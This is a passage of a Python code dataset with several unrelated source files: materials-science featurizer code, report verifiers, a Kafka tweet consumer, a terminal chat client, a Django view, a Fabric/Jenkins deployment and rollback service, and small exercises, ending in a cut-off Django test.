x, y = pattern.x, pattern.y\n hist = []\n for x1, y1 in zip(x, y):\n num = int(y1)\n hist += [x1] * num\n\n kernel = gaussian_kde(hist, bw_method=self.bw_method)\n x = np.linspace(self.two_theta_range[0], self.two_theta_range[1],\n self.pattern_length)\n y = kernel(x)\n\n return y\n\n def feature_labels(self):\n return ['xrd_{}'.format(x) for x in range(self.pattern_length)]\n\n def citations(self):\n return [\"@article{Ong2013, author = {Ong, Shyue Ping and Richards, \"\n \"William Davidson and Jain, Anubhav and Hautier, \"\n \"Geoffroy and Kocher, Michael and Cholia, Shreyas and Gunter, \"\n \"Dan and Chevrier, Vincent L. and Persson, \"\n \"Kristin A. 
and Ceder, Gerbrand}, \"\n                \"doi = {10.1016/j.commatsci.2012.10.028}, issn = {09270256}, \"\n                \"journal = {Computational Materials Science}, month = {feb}, \"\n                \"pages = {314--319}, \"\n                \"publisher = {Elsevier B.V.}, title = {{Python Materials \"\n                \"Genomics (pymatgen): A robust, open-source python \"\n                \"library for materials analysis}}, url = \"\n                \"{http://linkinghub.elsevier.com/retrieve/pii/S0927025612006295}, \"\n                \"volume = {68}, year = {2013} } \"]\n\n    def implementors(self):\n        return ['Anubhav Jain', 'Matthew Horton']\n","sub_path":"matminer/featurizers/structure/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":15556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"581096662","text":"from __future__ import annotations\n\nimport re\nimport tasks\nimport pandas as pd\n\nfrom error import VerificationError\nfrom fabrica import Verifier\nfrom data_layer import SQLQuery\nfrom io import StringIO\nfrom abc import abstractmethod\nfrom typing import Any, TypeVar, Generic, Optional, Dict, List\n\nclass Verification:\n    \"\"\"A verification of one comparison between two data sets that should match.\"\"\"\n\n    class VerificationResult:\n        \"\"\"A descriptive result of comparing two data sets\"\"\"\n        identifier: str\n        description: str\n        success: bool\n        required: bool\n\n        def __init__(self, identifier: str, success: bool, required: bool, description: str):\n            self.identifier = identifier\n            self.success = success\n            self.required = required\n            self.description = description\n\n    identifier: str\n    task_pattern: Optional[re.Pattern]\n    required: bool\n    verify: Dict[str, Any]\n    before: bool\n    after: bool\n\n    def __init__(self, identifier: str, configuration: Dict[str, Any]):\n        self.identifier = identifier\n        self.task_pattern = re.compile(configuration['task_pattern']) if 'task_pattern' in configuration else None\n        self.required = configuration['required'] if 'required' in configuration else True\n        self.verify = configuration['verify']\n        self.before = configuration['before'] if 'before' in configuration else False\n        self.after = configuration['after'] if 'after' in configuration else False\n\n    def result_description(self, result: Verifier.Verification) -> str:\n        return f'''files: {\" \".join([\n            result.json_path_a,\n            result.json_path_b,\n            result.csv_path_a,\n            result.csv_path_b\n        ])}'''\n\n    def matches_task_type(self, task_type: str) -> bool:\n        return self.task_pattern is None or self.task_pattern.match(task_type) is not None\n\n    def verify_task(self, task: tasks.ReportTask) -> Verification.VerificationResult:\n        verifier = Verifier(database=task.sql_layer.connection_options.database)\n        result = verifier.verify(**self.verify)\n        return Verification.VerificationResult(\n            identifier=self.identifier,\n            success=result.success,\n            required=self.required,\n            description=self.result_description(result=result)\n        )\n\nT = TypeVar('T', bound=tasks.ReportTask)  # TypeVar requires its name as a string; bound keeps the ReportTask constraint\n\"\"\"Generic ReportTask\"\"\"\n\nclass ReportVerifier(Generic[T]):\n    \"\"\"An abstract base verifier for performing a set of verifications.\"\"\"\n    task: T\n\n    def __init__(self, task: 'T'):\n        self.task = task\n\n    @abstractmethod\n    def verify(self):\n        pass\n\nclass BaseReportVerifier(ReportVerifier):\n    \"\"\"A concrete base verifier that performs all verifications matching a task type.\"\"\"\n    @property\n    def verifications(self) -> List[Verification]:\n        return list(filter(lambda v: v.matches_task_type(self.task.task_type.value), [\n            Verification(\n                identifier=k,\n                configuration=v\n            )\n            for 
 k, v in sorted(self.task.verifications.items(), key=lambda t: t[0])\n ]))\n\n def verify(self):\n verifications = self.verifications\n if not verifications:\n return\n results = [\n v.verify_task(task=self.task)\n for v in verifications\n ]\n error_descriptions = [\n f'{r.identifier} ({r.description})' for r in results if not r.success and r.required\n ]\n if error_descriptions:\n raise VerificationError(verifications=error_descriptions)\n newline = '\\n'\n return f'{len(list(filter(lambda r: r.success, results)))} / {len(results)} verification{\"s\" if len(results) != 1 else \"\"} passed:\\n{newline.join(\"Verification \" + (\"succeeded\" if r.success else \"FAILED\") + f\" ——> {r.identifier}\" + (\" (required)\" if r.required else \"\") + (f\" {r.description}\" if r.description else \"\") for r in results)}'\n\nclass BeforeReportVerifier(BaseReportVerifier):\n \"\"\"A concrete verifier that performs all verifications that should occur before main task execution.\"\"\"\n @property\n def verifications(self) -> List[Verification]:\n return list(filter(lambda v: v.before, super().verifications))\n\nclass AfterReportVerifier(BaseReportVerifier):\n \"\"\"A concrete verifier that performs all verifications that should occur after main task execution.\"\"\"\n @property\n def verifications(self) -> List[Verification]:\n return [\n *([RowCountVerification(\n task=self.task,\n required=True,\n allow_empty=True\n )] if self.task.run_date is not None and self.task.row_count is not None else []),\n *filter(lambda v: v.after, super().verifications),\n ]\n\nclass VoidReportVerifier(ReportVerifier):\n \"\"\"A concrete verifier that performs no verifications at all.\"\"\"\n def verify(self):\n pass\n\nclass RowCountVerification(Verification):\n \"\"\"A verification that the task's row count matches the number of rows in its table with a fetch_date value of the task's run_date.\"\"\"\n task: tasks.ReportTask\n allow_empty: bool\n\n def __init__(self, task: tasks.ReportTask, required: bool=True, allow_empty: bool=True):\n self.task = task\n self.allow_empty = allow_empty\n inserted_row_count_query = SQLQuery(\n query=f'''\nselect count(*) as row_count \nfrom {self.task.report_table_model.full_table_name}\nwhere fetch_date = %s;\n ''',\n substitution_parameters=(SQLQuery.format_time(self.task.run_date),)\n )\n report_row_count_stream = StringIO()\n pd.DataFrame([{\n 'row_count': self.task.row_count if self.task.row_count is not None else 0,\n }]).to_csv(report_row_count_stream, index=False)\n report_row_count_stream.seek(0)\n super().__init__(\n identifier='row_count',\n configuration={\n 'required': required,\n 'after': True,\n 'verify': {\n 'name_a': 'inserted_row_count',\n 'text_a': inserted_row_count_query.substituted_query,\n 'name_b': 'report_row_count',\n 'stream_b': report_row_count_stream,\n 'csv_b': True,\n }\n }\n )\n\n def result_description(self, result: Verifier.Verification) -> str:\n return f'{self.task.row_count} report rows. 
{super().result_description(result=result)}'\n\n def verify_task(self, task: tasks.ReportTask) -> Verification.VerificationResult:\n assert task is self.task\n if task.row_count is None:\n return Verification.VerificationResult(\n identifier=self.identifier,\n success=self.allow_empty,\n required=self.required,\n description='No report rows.'\n )\n return super().verify_task(task=task)\n","sub_path":"verifying/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"594146128","text":"#!/usr/bin/python3\n\nfrom kafka.consumer import SimpleConsumer\nfrom kafka import SimpleClient\nimport argparse\nimport os\nimport json\n\nif __name__ == '__main__':\n # creating an argument parser to define where to get the messages from and where to dump them\n argument_parser = argparse.ArgumentParser()\n argument_parser.add_argument('--topic', type=str, default='trump')\n argument_parser.add_argument('--hosts', type=str, default='localhost:9092')\n argument_parser.add_argument('--path', type=str, default='./tweets')\n\n arguments = argument_parser.parse_args()\n\n # getting the topic to collect the messages from\n topic_to_collect_from = arguments.topic\n # getting the hosts of the brokers\n kafka_hosts = arguments.hosts\n # getting the path to the file where we will dump the content of topic\n path_to_sink_folder = arguments.path\n\n # creating the folder if it does not exist\n try:\n os.stat(path_to_sink_folder)\n except FileNotFoundError:\n os.mkdir(path_to_sink_folder)\n\n # instantiating a Kafka client\n kafka_client = SimpleClient(hosts=kafka_hosts)\n\n # instantiating a Kafka consumer\n kafka_consumer = SimpleConsumer(client=kafka_client, topic=topic_to_collect_from, group='simple_consumer_group')\n\n # looping over the values\n fetch_tweets = True\n counter = 0\n while fetch_tweets:\n messages = kafka_consumer.get_messages(count=1)\n counter += 1\n if len(messages) == 0:\n fetch_tweets = False\n else:\n file_name = 'tweet_n_{}.json'.format(counter+1)\n message = json.loads(messages[0].message.value)\n with open(os.path.join(path_to_sink_folder, file_name), 'w', encoding='utf-8') as json_file:\n json.dump(message, json_file)\n","sub_path":"solutions/kafka_consumer_twitter.py","file_name":"kafka_consumer_twitter.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"358774039","text":"import asyncio\nimport socketio\nimport sys\nimport os\nimport argparse\nfrom colorama import init, Fore, Style\nfrom time import sleep\nfrom threading import Thread\nfrom multiprocessing import Process\n\nSYSTEM = os.name\n\n# Colorama module init\ninit()\n\nPARSER = argparse.ArgumentParser(description=\"Simple terminal chat client\")\nPARSER.add_argument(\n \"host\",\n type=str,\n nargs=\"?\",\n help=\"Address of host, default: localhost:5000\",\n default=\"localhost:5000\",\n)\n\nSIO = socketio.AsyncClient()\nLOOP = asyncio.get_event_loop()\nUSERNAME = None\n\n\n# * Sync functions\n\n\ndef reset_styles() -> None:\n print(Style.RESET_ALL, end=\"\")\n\n\ndef danger_style() -> str:\n return f\"{Style.BRIGHT}{Fore.RED}\"\n\n\ndef user_input_style() -> str:\n return f\"{Style.BRIGHT}{Fore.GREEN}\"\n\n\ndef exit_application() -> None:\n LOOP.call_soon_threadsafe(LOOP.stop)\n os._exit(0)\n\n\ndef clear_screen() -> None:\n os.system(\"cls\" if SYSTEM == \"nt\" else \"clear\")\n\n\ndef trying_message() -> None:\n 
temp = \"Trying to connect\"\n count = 0\n while True:\n print(temp + \".\" * count, end=\"\\r\")\n count += 1\n sleep(0.1)\n\n\ndef print_reset(text: str, end=\"\\n\") -> None:\n \"\"\"print implementation with Style.RESET_ALL\"\"\"\n print(f\"{text}{Style.RESET_ALL}\", end=end)\n\n\ndef show_user_input(username: str) -> None:\n print_reset(f\"{user_input_style()}{username}: \", end=\"\")\n\ndef set_user_username(*args) -> None:\n if args:\n global USERNAME\n USERNAME = args[0]\n else:\n print_reset(f'{danger_style()}Username already taken')\n\n\n# * Async functions\n\n\n@SIO.event\nasync def connect():\n # Stop displaying trying to connect message\n trying_message_process.terminate()\n clear_screen()\n print_reset(f\"{Fore.GREEN}Connected!\")\n\n\n@SIO.event\nasync def connect_error():\n # Stop displaying trying to connect message\n trying_message_process.terminate()\n print_reset(f\"{danger_style()} The connection failed!\")\n\n\n@SIO.event\nasync def disconnect():\n print_reset(f\"{danger_style()} Disconnected!\")\n\n\n@SIO.event\nasync def message(data) -> None:\n reset_styles()\n print(f\"\\r{Style.BRIGHT}{Fore.CYAN}{data.get('username')}: {Style.RESET_ALL}{data.get('message')}\")\n show_user_input(USERNAME)\n\nasync def send_message(message: str) -> None:\n await SIO.emit(\"message\", message)\n\nasync def is_username_avaiable(username: str) -> None:\n await SIO.emit('is_username_avaiable', username, callback=set_user_username)\n\n\nasync def connect_to_server(host: str):\n try:\n await SIO.connect(f'http://{host}')\n except socketio.exceptions.ConnectionError:\n # Stop displaying trying to connect message\n trying_message_process.terminate()\n print_reset(f\"{danger_style()}\\nDisconnecting... [ConnectionError]\")\n exit_application()\n\n try:\n await SIO.wait()\n except AttributeError:\n print_reset(f\"{danger_style()}\\nDisconnecting... 
[ServerWasClosedUnexpected]\")\n exit_application()\n\n\nif __name__ == \"__main__\":\n args = PARSER.parse_args()\n trying_message_process = Process(target=trying_message)\n trying_message_process.start()\n # Connect to server on separate thread, so user can use terminal\n t = Thread(target=lambda: LOOP.run_until_complete(connect_to_server(args.host)))\n t.start()\n # Get username\n try:\n while True:\n sleep(0.1)\n if not trying_message_process.is_alive():\n if not USERNAME:\n show_user_input('Pick Your username')\n new_username = input()\n if new_username:\n asyncio.run_coroutine_threadsafe(is_username_avaiable(new_username), LOOP)\n else:\n # ANSI Escape\n print('\\033[A', end='')\n else:\n clear_screen()\n break\n # Main loop\n while True:\n # Show user input after screen is clear and connected message shown\n sleep(0.1)\n show_user_input(USERNAME)\n user_message = input()\n if user_message:\n asyncio.run_coroutine_threadsafe(send_message(user_message), LOOP)\n else:\n # ANSI Escape\n print('\\033[A', end='')\n except KeyboardInterrupt:\n print_reset(f\"{danger_style()}\\nDisconnecting...\")\n exit_application()","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"182313744","text":"# Create your views here.\n# from django.core import serializers\nfrom django.core.serializers.json import Serializer\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom maps.models import Article\n\n\nclass ShortSerializer(Serializer):\n def get_dump_object(self, obj):\n return self._current\n\n def end_serialization(self):\n for i, ob in enumerate(self.objects):\n self.objects[i] = {\n k: v for k, v in ob.get('fields', {}).items()}\n return super(ShortSerializer, self).end_serialization()\n\n\ndef articles(request):\n try:\n articles = Article.objects.filter(enable=True)\n except Article.DoesNotExist:\n return HttpResponseNotFound(mimetype='application/json; charset=utf8')\n\n s = ShortSerializer()\n output = s.serialize(\n articles,\n fields=(\n 'lat', 'lng', 'interest',\n 'title', 'place', 'url'),\n ensure_ascii=False,\n )\n return HttpResponse(output, mimetype='application/json; charset=utf8')\n","sub_path":"maps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"349238725","text":"# -*- coding: utf-8 -*-\n# @Time : 17-8-17 上午9:14\n# @Author : Wang Chao\n\nimport os\nimport threading\nfrom .models import Deploys\nimport fnmatch\nfrom django.conf import settings\nfrom utils.fabfile import Fabapi\nfrom utils.jenkinsjob import JenkinsJob\nimport base64\nimport time\nimport traceback\n\n\n\ndef deploy_thread(project_id, deploy_id, deploys):\n deploy = Deploys.objects.filter(id=deploy_id).get()\n\n jenkinsip = settings.JENKINSIP\n jenkinsjob = deploy.project.jenkins_name\n jenkinsworkspace = os.path.join(settings.JENKINSBASEPATH, '{0}.{1}'.format(deploy.branch, jenkinsjob))\n\n localws = os.path.join(deploy.project.local_dir, 'qa/')\n\n if deploy.status != 3:\n return\n try:\n deploys.update(deploy, progress=0, status=2)\n\n # =======before checkout========\n cmd = \"mkdir -p {local_dir} && cd {local_dir} && rm -rf {local_dir}/*.war {local_dir}/*.jar\".format(\n local_dir=localws)\n f = Fabapi(hostip=jenkinsip)\n f.remoted(cmd)\n deploys.update(deploy, progress=5, status=2)\n deploys.append_comment(deploy, \"Jenkins 
任务:\\n--任务名称:{0},git分支:{1}\\n\".format(jenkinsjob, deploy.branch))\n\n # ======== Jenkins ========\n if deploy.jenkinsbd.strip() == 'yes':\n deploys.append_comment(deploy, \"--拉取代码并编译打包(by git and maven)\\n\")\n jenkins = JenkinsJob(username=settings.JENKINSUSER, password=base64.b64decode(settings.JENKINSPASS),\n jobname='{0}.{1}'.format(deploy.branch, jenkinsjob))\n j = jenkins.jobbuild()\n result = j['result']\n num = int(j['num'])\n if not result == 'SUCCESS':\n deploys.append_comment(deploy, \"--Jenkins 构建失败\\n\\n\")\n raise Exception(\"Jenkins\")\n else:\n deploys.append_comment(deploy,\n \"--Jenkins 构建成功\\n\"\n \"--任务日志请访问:/deploy/code/jenkins/?jobname={0}.{1}&&num={2}\\n\\n\".format(\n deploy.branch, jenkinsjob, num))\n else:\n deploys.append_comment(deploy, \"--Jenkins 任务本次不执行构建\\n\\n\")\n deploys.update(deploy, progress=15, status=2)\n\n deploys.append_comment(deploy, \"开始部署:\\n\")\n # ========= checkouting ==========\n deploys.append_comment(deploy, \"检出应用程序包。。。\\n\")\n time.sleep(1)\n\n # ========= copy wars to local ============\n for warnames in deploy.warnames.strip().split(','):\n cmd = \"find {jenkinsworkspace} -iname {warnames} | xargs ls -lta | awk '{{print $NF}}' | head -n 1\".format(\n jenkinsworkspace=jenkinsworkspace,\n warnames=warnames)\n\n warpath = f.remoted(cmd)\n print(warpath)\n time.sleep(1)\n f.getfile(local_dest=localws, remote_dest=warpath)\n # execute(jenkinsfab.getfile, local_dest=localws, remote_dest=warpath)\n deploys.append_comment(deploy, \"程序包下载完成\\n\".format(warnames))\n\n deploys.update(deploy, progress=45, status=2)\n\n # =========== before deploy =================\n hostfab = Fabapi(hostip=deploy.host.public_ip)\n deploys.append_comment(deploy, \"准备部署 目标主机: {0}\\n\".format(deploy.host.public_ip))\n cmd = (\"mkdir -p {remote_history_dir} && chmod -R 777 {remote_history_dir}\".format(\n remote_history_dir=os.path.join(deploy.project.remote_history_dir,\n deploy.created_at.strftime('%Y%m%d-%H%M%S'))))\n hostfab.remoted(cmd)\n # execute(hostfab.remoted, rd=cmd, sudoif=1)\n\n deploys.append_comment(deploy, \"--删除过期的历史备份\\n\")\n cmd = (\"WORKSPACE='{0}' && cd $WORKSPACE && ls -1t | tail -n +{1} | xargs rm -rf\".format(\n deploy.project.remote_history_dir, settings.MAX_DEPLOY_HISTORY))\n hostfab.remoted(cmd)\n # execute(hostfab.remoted, rd=cmd, sudoif=1)\n before_deploy = deploy.project.before_deploy.replace(\"\\r\", \"\").replace(\"\\n\", \" && \")\n # ========== create dest dirs ===================\n\n cmd = (\"mkdir -p {destwar_dir} \".format(destwar_dir=deploy.project.destwar_dir))\n hostfab.remoted(cmd)\n # execute(hostfab.remoted, rd=cmd, sudoif=1)\n if before_deploy:\n cmd = before_deploy\n hostfab.remoted(cmd)\n deploys.append_comment(deploy, \"暂停tomcat应用\\n--exec {0}\\n\".format(cmd))\n # execute(hostfab.remoted, rd=cmd, sudoif=1)\n\n deploys.update(deploy, progress=67, status=2)\n\n if deploy.project.destwar_dir.replace(\"\\r\", \"\").replace(\"\\n\", \"\"):\n for war_name in deploy.warnames.strip().split(','):\n app_name = war_name.split('.')[0]\n if app_name:\n try:\n cmd = (\n \"mv {destwar_dir}/{war_name} {remote_history_dir} ; rm -rf {destwar_dir}/{app_name} \".format(\n destwar_dir=deploy.project.destwar_dir,\n war_name=war_name,\n app_name=app_name,\n remote_history_dir=os.path.join(deploy.project.remote_history_dir,\n deploy.created_at.strftime('%Y%m%d-%H%M%S'))))\n\n deploys.append_comment(deploy, \"--执行本次备份\\n\")\n hostfab.remoted(cmd)\n # execute(hostfab.remoted, rd=cmd, sudoif=1)\n deploys.append_comment(deploy, 
\"--部署新版本应用包\\n\")\n hostfab.putfile(local_dest=\"%s/%s\" % (localws, war_name),\n remote_dest=deploy.project.destwar_dir)\n # execute(hostfab.putfile, local_dest=\"%s/%s\" % (localws, war_name),\n # remote_dest=deploy.project.destwar_dir)\n except BaseException as e:\n print(e)\n else:\n raise Exception(\"project not exists\")\n\n deploys.append_comment(deploy, \"部署完成!\\n\")\n deploys.update(deploy, progress=83, status=2)\n\n # =============== after deploy =============\n deploys.append_comment(deploy, \"启动服务并健康检查\\n\")\n\n after_deploy = deploy.project.after_deploy.replace(\"\\r\", \"\").replace(\n \"\\n\", \" && \")\n if after_deploy:\n cmd = after_deploy\n deploys.append_comment(deploy, \"--exec {0}\\n\".format(cmd))\n f.remoted(cmd)\n time.sleep(10)\n deploys.append_comment(deploy, \"应用启动正常\\n\")\n deploys.append_comment(deploy, \"完成,结束!\\n\")\n\n except BaseException as err:\n traceback.print_exc()\n\n deploys.append_comment(deploy, repr(err))\n deploys.update(deploy, progress=100, status=0)\n else:\n deploys.update(deploy, progress=100, status=1)\n finally:\n\n deploy = deploys.first(id=deploy_id)\n if deploy:\n deploys.deploy(deploy)\n\n\ndef rollback_thread(project_id, deploy_id, deploys):\n deploy = Deploys.objects.filter(id=deploy_id).get()\n deploy.comment = ''\n deploy.save()\n if deploy.status != 1:\n deploys.append_comment(deploy, \"该次部署不成功,不能回滚\\n\")\n\n try:\n # before rollback\n deploys.append_comment(deploy, \"检查备份文件(at {0})\\n\".format(deploy.created_at.strftime('%Y%m%d-%H%M%S')))\n f = Fabapi(hostip=deploy.host.public_ip)\n apppath = os.path.join(deploy.project.remote_history_dir, deploy.created_at.strftime('%Y%m%d-%H%M%S'),\n deploy.warnames)\n cmd = '[ -f {0} ] && echo 0 || echo 1 | head -n 1'.format(apppath)\n\n res = f.remoted(cmd)\n\n if res != '0':\n deploys.append_comment(deploy, \"备份文件不存在,回滚终止\\n\")\n raise Exception(\"备份文件不存在,回滚终止\")\n\n deploys.append_comment(deploy, \"备份文件存在,回滚开始\\n\")\n deploys.update(deploy, progress=33, status=2)\n # rollback\n\n cmd = (\n \"rm -rf {destwar_dir}/{war_name} ; rm -rf {destwar_dir}/{app_name} \".format(\n destwar_dir=deploy.project.destwar_dir,\n war_name=deploy.warnames,\n app_name=deploy.warnames.split('.')[0]))\n\n f.remoted(cmd)\n deploys.append_comment(deploy, \"---清空旧数据\\n\")\n deploys.update(deploy, progress=67, status=2)\n\n cmd = (\n \"cp -rp {apppath} {destwar_dir}\".format(apppath=apppath, destwar_dir=deploy.project.destwar_dir)\n )\n f.remoted(cmd)\n deploys.append_comment(deploy, \"---恢复文件完成\\n\")\n\n # after rollback\n # =============== after deploy =============\n deploys.append_comment(deploy, \"启动服务并健康检查\\n\")\n after_deploy = deploy.project.after_deploy.replace(\"\\r\", \"\").replace(\n \"\\n\", \" && \")\n if after_deploy:\n cmd = after_deploy\n deploys.append_comment(deploy, \"exec {0}\\n\".format(cmd))\n f.remoted(cmd)\n time.sleep(10)\n deploys.append_comment(deploy, \"应用启动正常\\n\")\n deploys.append_comment(deploy, \"回滚完成,结束!\\n\")\n deploys.update(deploy, progress=100, status=4)\n\n except Exception as err:\n traceback.print_exc()\n deploys.append_comment(deploy, repr(err))\n deploys.update(deploy, progress=100, status=5)\n else:\n deploys.update(deploy, progress=100, status=1)\n finally:\n\n deploy = deploys.first(id=deploy_id)\n if deploy:\n deploys.deploy(deploy)\n\n\ndef iterfindfiles(path, fnexp):\n for root, dirs, files in os.walk(path):\n for warfile in fnmatch.filter(files, fnexp):\n yield os.path.join(root, warfile)\n\n\nclass DeploysService(object):\n def first(self, **kargs):\n # returns a single object\n 
return Deploys.objects.filter(**kargs).get()\n\n def update(self, deploy, progress, status):\n deploy.progress = progress\n deploy.status = status\n deploy.save()\n\n def deploy(self, deploy):\n t = threading.Thread(target=deploy_thread,\n args=(deploy.project_id, deploy.id, deploys),\n name=\"pydelo-deploy[%d]\" % deploy.id)\n t.start()\n\n def rollback(self, deploy):\n t = threading.Thread(target=rollback_thread,\n args=(deploy.project_id, deploy.id, deploys),\n name=\"pydelo-rollback[%d]\" % deploy.id)\n t.start()\n\n def append_comment(self, deploy, comment):\n if deploy.comment:\n deploy.comment = str(deploy.comment) + comment\n else:\n deploy.comment = comment\n deploy.save()\n return deploy\n\n\ndeploys = DeploysService()\nrundeploys = DeploysService()\n","sub_path":"ops/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":11160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"614861004","text":"#!/bin/python3\n\nimport sys\n\n'''\nClass to count number of items less then provided value.\nKeeps track of previous count for performance, traverses full list once.\n'''\nclass CachedCounter():\n\t'''\n\tInit with integer list\n\t'''\n\tdef __init__(self, lst):\n\t\tself.cachedCount = 0;\n\t\tself.index = 0;\n\t\tself.lst = sorted(lst);\n\t\tself.lastSearch = 0;\n\n\t'''\n\tReturns count of values in lst that are less or equal to\n\tthe provided integer.\n\n\tFor linear runtime, the first value provided should be the smallest\n\tand each proeceding value should be larger than the former.\n\t'''\n\tdef getCachedCount(self, q):\n\n\t\t# Bad case, resets cached counter.\n\t\tif (q < self.lastSearch):\n\t\t\tself.cachedCount = 0;\n\t\t\tself.index = 0;\n\t\t# If same value as last call, return same value\n\t\telif (q == self.lastSearch):\n\t\t\treturn self.cachedCount;\n\n\t\t# Retain count for smaller items, count up from last used index\n\t\tlastVal = 0;\n\t\tfor i in range(self.index, len(self.lst)):\n\t\t\tval = self.lst[i];\n\t\t\tif (val > q):\n\t\t\t\tbreak; # Done\n\t\t\tself.cachedCount += 1;\n\t\t\tself.index = i + 1; # offset, start at next index next time\n\n\t\tself.lastSearch = q;\n\t\treturn self.cachedCount;\n\n\t'''\n\tReturns print out of object for debuging\n\t'''\n\tdef __str__(self):\n\t\treturn \"Count:\" + str(self.cachedCount) +\\\n\t\t\", index:\" + str(self.index) +\\\n\t\t\" ,lastSearch:\" + str(self.lastSearch);\n\n\tdef __repr__(self):\n\t\treturn self.__str__();\n\n'''\nReturns count of unique \"sum\" triplets given 3 integer lists.\n'''\ndef triplets(a, b, c):\n\n\tb = sorted(set(b));\n\n\tcountFromA = CachedCounter(a);\n\tcountFromC = CachedCounter(c);\n\n\tcount = 0;\n\tfor val in b:\n\t\t# count values in a less or equal to val\n\t\tcountA = countFromA.getCachedCount(val);\n\t\tcountC = countFromC.getCachedCount(val);\n\t\tcount += countA * countC;\n\t\tlastVal = val;\n\n\treturn count;\n\n'''\nMain call provided as starter code for challenge:\n'''\nif __name__ == '__main__':\n\tfptr = sys.stdout;\n\n\tlenaLenbLenc = input().split()\n\n\tlena = int(lenaLenbLenc[0])\n\n\tlenb = int(lenaLenbLenc[1])\n\n\tlenc = int(lenaLenbLenc[2])\n\n\tarra = list(map(int, input().rstrip().split()))\n\n\tarrb = list(map(int, input().rstrip().split()))\n\n\tarrc = list(map(int, input().rstrip().split()))\n\n\tans = triplets(arra, arrb, arrc)\n\n\tfptr.write(str(ans) + 
'\\n')\n\n\tfptr.close()\n\n","sub_path":"python/challenges/tripleSum/tripleSum.py","file_name":"tripleSum.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"315162424","text":"from Component import Component\n\n\nclass Leaf(Component):\n def __init__(self, x=0, y=0):\n self.x = x\n self.y = y\n self.children = []\n \n def move(self, x_distance : float, y_distance : float, k : int) -> None:\n print(k*'\\t' + f\"{type(self)} : ( {self.x}, {self.y} ) --> \", end=\"\")\n # Muevo al objeto hijo\n self.x += x_distance\n self.y += y_distance\n print(f\"( {self.x}, {self.y} )\")\n\n\n","sub_path":"CompositePython/GraphicsImplementation/Leaf.py","file_name":"Leaf.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"122999346","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom importlib import import_module\n\nfrom machine.utils.collections import CaseInsensitiveDict\n\n\ndef import_settings(settings_module=\"local_settings\"):\n default_settings = {\n \"PLUGINS\": [\n \"machine.plugins.builtin.general.PingPongPlugin\",\n \"machine.plugins.builtin.general.HelloPlugin\",\n \"machine.plugins.builtin.help.HelpPlugin\",\n \"machine.plugins.builtin.fun.memes.MemePlugin\",\n ],\n \"STORAGE_BACKEND\": \"machine.storage.backends.memory.MemoryStorage\",\n \"DISABLE_HTTP\": False,\n \"HTTP_SERVER_HOST\": \"0.0.0.0\",\n \"HTTP_SERVER_PORT\": 8080,\n \"HTTP_SERVER_BACKEND\": \"wsgiref\",\n \"HTTP_PROXY\": \"\",\n \"HTTPS_PROXY\": \"\",\n \"KEEP_ALIVE\": None,\n }\n settings = CaseInsensitiveDict(default_settings)\n try:\n local_settings = import_module(settings_module)\n found_local_settings = True\n except ImportError:\n found_local_settings = False\n else:\n for k in dir(local_settings):\n if not k.startswith(\"_\"):\n settings[k] = getattr(local_settings, k)\n\n for k, v in os.environ.items():\n if k[:3] == \"SM_\":\n k = k[3:]\n settings[k] = v\n\n return settings, found_local_settings\n","sub_path":"machine/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"324721933","text":"import math\nimport pandas as panda\nimport matplotlib.pyplot as plt\n\ndata_field1 = panda.read_csv('Sensor.csv')\nx_value = data_field1['ORIENTATIONX']\ny_value = data_field1['ORIENTATIONY']\na_value = data_field1['LIGHT']\nz_value = data_field1['ORIENTATIONZ']\ntime = []\nmultiplicationxy = list()\nfor i in range(0, 392, 1):\n multiplicationxy.append(math.sqrt(math.pow(x_value[i], 2) +\n math.pow(y_value[i], 2))*10)\nfor j in range(0, 392, 1):\n time.append(j)\nplt.plot(time, multiplicationxy, 'r', label='XY Orientation')\nplt.plot(time, a_value, 'b', label='Light')\nplt.xlabel('Number of Samples')\nplt.ylabel('Light and Orientation')\nplt.title('Orientation of the Phone vs. 
Light')\nplt.legend(loc='upper left')\nplt.show()\n\n\n\n","sub_path":"Activity2.py","file_name":"Activity2.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"552214099","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2020 EMBL - European Bioinformatics Institute\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport pytest\n\nfrom django.core.urlresolvers import reverse\n\nfrom rest_framework import status\n\nfrom model_bakery import baker\n\nfrom test_utils.emg_fixtures import * # noqa\n\n\n@pytest.mark.django_db\nclass TestPermissionsAPI(object):\n\n @pytest.fixture(autouse=True)\n def setup_method(self, db):\n _biome = baker.make('emgapi.Biome', biome_name=\"foo\",\n lineage=\"root:foo\", pk=123)\n\n # Webin-000 public\n baker.make(\"emgapi.Study\", pk=111, secondary_accession=\"SRP0111\",\n is_public=1, 